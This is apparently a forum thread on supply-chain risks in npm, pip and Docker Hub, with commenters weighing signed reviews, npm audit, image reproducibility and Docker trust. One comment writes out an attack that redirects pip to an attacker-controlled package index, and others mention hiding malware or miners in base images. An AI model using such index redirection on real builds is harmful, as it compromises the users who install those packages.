
I wonder how much malicious code like this is doing its work deep down in the endless pyramid of npm dependencies.

And how much as-of-now clean code will turn into malicious code when bad guys take over npm repos in the future.

It might be possible to tackle this issue with some intelligent trust algo that combines a trust rank (similar to Google's PageRank) with signed messages.

Say somebody pushes an update to their repo. Now the first user of it might read it and sign it with 'Looks OK /Joe'. And the next user sees the signed message by Joe in some kind of package-review-message list. Based on all the reviews and the trust of the reviewers, they can then calculate a trust score for the update.
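
The signing part could already be prototyped with existing tools; a rough sketch (the package name and reviewer are just placeholders):

    # Fetch the exact tarball users would install and record its hash
    npm pack left-pad@1.3.0
    shasum -a 256 left-pad-1.3.0.tgz > review.txt
    # Append the verdict and clear-sign the whole thing with the reviewer's key
    echo "Looks OK /Joe" >> review.txt
    gpg --clearsign review.txt
    # Other users verify the signature and weight the verdict by how much
    # they trust Joe's key (the PageRank-like part would aggregate these)
    gpg --verify review.txt.asc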




...or CPAN modules, composer libs, cocoa pods, etc. Anything you use to install unchecked external code is potentially dangerous.

At least npm has auditing now, so checking for problems is relatively trivial. GitHub even does it automatically.
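
For example, with stock npm:

    # List known vulnerabilities in the installed dependency tree
    npm audit
    # In CI, fail the build only for high-severity advisories
    npm audit --audit-level=high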


Well, it's much, much easier for me to audit a CPAN module than a Docker image - the latter is practically impossible.


eh?

Assuming automated builds, you can just read the Dockerfile (and its hierarchy if necessary); its syntax is less complex than Perl's by a long way.

Even assuming no automated build, all the information is in the manifest, and using something like portainer it's pretty easy to read.


> you can just read the dockerfile

For many images, no Dockerfile is provided. And even if there is, it's not clear that it was actually used to produce the software. I tried many times to reproduce images from Dockerfiles and failed: what `apt-get update` does depends on the current time and your network configuration. You can never be sure what you get from DockerHub.

My strategy has been to copy the Dockerfiles and run `docker build` myself, instead of using the image files. Alas, it does not work very well.
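
Roughly like this (the repository URL is a placeholder):

    # Rebuild from the published Dockerfile instead of pulling the image
    git clone https://github.com/someorg/someimage.git && cd someimage
    docker build -t someimage:local .
    # Even then, two builds of the same Dockerfile can differ, because
    # 'apt-get update' fetches whatever the mirrors serve at build time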


So it should generally be possible to go from image --> Dockerfile, as the information is included in the manifest. If you save an image as a .tar.gz you can extract the info from there, or there are also tools to reverse engineer Dockerfiles from images:

https://samaritan.ai/blog/reversing-docker-images-into-docke...
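
You can also do the extraction by hand; the layer metadata lives right in the saved image (the image name below is just an example):

    # Save the image and pull out its manifest
    docker save ubuntu:20.04 -o ubuntu.tar
    tar -xf ubuntu.tar manifest.json
    # manifest.json points to a <id>.json config file whose 'history' array
    # lists the 'created_by' command for each layer, which is what the
    # reverse-engineering tools read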

That is a good point about lack of reproducibility though. I suppose an interesting attack would be to deliberately forge information in the manifest before pushing to Docker hub...

I also tend to treat anything other than the official images as "inspiration" and re-implement it myself.


> I suppose an interesting attack would be to deliberately forge information in the manifest before pushing to Docker hub...

"Forge" is a bit of a strong word. The main reason Docker included build information in the image history was so that build caching would work (from memory). It's not meant to be an authoritative source of information about how an image was built at all (not to mention that "RUN apt-get update" tells you almost nothing about what packages were installed, when they were updated, etc).

Personally I think that the current trend of using Dockerfiles is completely broken in terms of reproducibility and introspectability (I'm working on a blog post to better explain the issue).


Don't a lot of OS images start by importing a non-transparent prebuilt tarball containing nontrivial binaries? I would hide the malware inside those.


Sure, but so could the OS or app distributors. You need to establish a baseline of trust somewhere; that will likely be the official (or your cherry-picked) images, and you build from there.


The official images are made by the OS projects themselves, so if you can get malware in there, you can just get your malware into Debian/CentOS/Alpine and not even bother with Docker Hub :)


They do, but you can easily see what's being used as a base image. If it's something odd then you should think twice about using it.


How? The Dockerfile downloads a bunch of files/programs, and it's not clear what they are. How are you going to automatically catch these?


You can use `docker trust` to verify which key (if any) was used to sign a given Docker image. The `docker history` command will also give you a list of each of the layers, as well as the command which was used to create each layer.
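
For example (the image name is just a placeholder):

    # Show which keys (if any) have signed this tag via Docker Content Trust
    docker trust inspect --pretty someorg/myapp:latest
    # Walk the layers and the command that produced each one
    docker history --no-trunc someorg/myapp:latest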


It's trivial to insert software into the build pipeline without being noticed.

Run your own devpi server, build a compromised version of any dependency you want, and you can install whatever you would like, with no sign of it in the Dockerfile.
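
For example (the index hostname is made up), the Dockerfile line stays innocent-looking while the build environment quietly redirects pip:

    # The Dockerfile only says:
    #   RUN pip install requests
    # but pip resolves packages against whatever index the environment points it at
    export PIP_INDEX_URL=https://devpi.internal.example/root/pypi/+simple/
    pip install requests   # now pulls from the attacker-controlled mirror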


Between pip, npm and DockerHub, we seem to be inviting all kinds of lurking security holes. What if the code ends up in an embedded system that will probably never be updated again?



Seems like we need some kind of inter-repository git, allowing for signed commits and version control between repositories.


You get this type of security inherently via most OS-level packagers, which check upstream tarballs, especially the ports-like ones, which are primarily designed for from-source usage.

Unfortunately, there has been a trend of late to ignore these and install directly, especially for dynamic-language modules.
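
The mechanism is simple: the recipe pins the checksum of the upstream tarball, so a swapped tarball fails before anything is built (the filename is illustrative):

    # A ports-style recipe ships the expected digest next to the build script
    sha256sum -c foo-1.2.3.tar.gz.sha256   # aborts the build on mismatch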


Or in Windows, or in Linux, or in Android, or in IOS, or in OSX, ....

npm (and I think the other repos too) implements more and more security tools and procedures to reduce the risk. But 100% security is impossible.


    Or in Windows, or in Linux, or in Android,
    or in IOS, or in OSX
None of these let random users upload stuff to their repos.


But they have many developers. And one developer could insert code which works and passes tests, but which someday starts a download in the background and begins mining Monero.

The point is: you have to trust the developers at these companies not to do anything bad, and trust that the companies check every line of code from every dev. Trust.


Tools like Snyk are doing good work to try and solve this problem.

https://snyk.io/


This looks promising but I hope that _Snyk_ itself is not compromised. And of course, http://wiki.c2.com/?TheKenThompsonHack


npm packages are interesting in that they run both in the browser and on the server -- it stands to reason that the in-browser attack surface is far larger, and its impact would rarely be noticed by users (since they're already accustomed to websites taking up inordinate amounts of resources).



